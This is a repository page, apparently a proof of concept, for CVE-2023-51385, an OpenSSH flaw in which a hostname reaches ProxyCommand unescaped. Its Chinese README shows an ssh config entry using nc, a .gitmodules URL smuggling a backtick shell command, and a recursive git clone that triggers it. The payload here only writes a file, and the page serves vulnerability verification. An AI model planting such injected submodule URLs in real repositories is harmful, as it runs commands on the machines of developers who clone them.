# CVE-2023-51385_test **Repository Path**: rtpyzaL/CVE-2023-51385_test ## Basic Information - **Project Name**: CVE-2023-51385_test - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 1 - **Forks**: 5 - **Created**: 2024-01-20 - **Last Updated**: 2024-04-10 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ## 验证CVE-2023-51385 ### 首先需要在`~/.ssh/config`增加如下 ``` host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p ``` `.gitmodules`文件语句中存在命令注入 ``` url = ssh://`echo helloworld > cve.txt`foo.example.com/bar ``` 配置完成后,执行下面的指令触发 ``` git clone https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules ``` 如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件 ![image-20231225234031349](https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png) 详细信息见这篇博客: https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html